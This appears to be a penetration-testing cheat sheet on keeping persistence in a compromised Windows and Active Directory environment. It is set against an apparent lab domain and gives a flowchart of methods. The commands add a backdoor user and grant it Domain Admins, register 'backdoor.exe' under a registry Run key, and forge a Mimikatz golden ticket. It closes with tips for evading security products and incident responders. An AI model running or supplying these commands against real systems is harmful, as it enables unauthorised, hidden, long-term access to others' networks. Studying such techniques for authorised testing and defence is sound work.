Select a result to preview
Goal: Maintain access to a compromised system across reboots, logoffs, or detection attempts.
Maintain access after reboot or user logout
Blend into the environment using native tools or low-noise methods
Avoid detection by security products or incident responders
graph TD
A[Privileged Access Achieved] --> B[Choose Persistence Method]
B --> C[Create Local or Domain User]
B --> D[Abuse Startup Tasks or Services]
B --> E[Schedule Tasks or WMI Events]
B --> F[Abuse GPO, ACLs, or RBCD]
C --> G[Maintain Login Capability]
D --> G
E --> G
F --> Gnet user pentest Temp123! /add
net group "Domain Admins" pentest /add /domain
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\Public\backdoor.exe"
kerberos::golden /user:hacker /domain:INLANEFREIGHT.LOCAL /sid:<domain_sid> /krbtgt:<ntlm_hash> /ptt
Use legit system paths for payloads (e.g., C:\ProgramData)
Set delayed or random execution for tasks to reduce detection
For high stealth: WMI, GPO abuse, or scheduled tasks with harmless names
Persist via misconfigured ACLs and backup RDP accounts for re-entry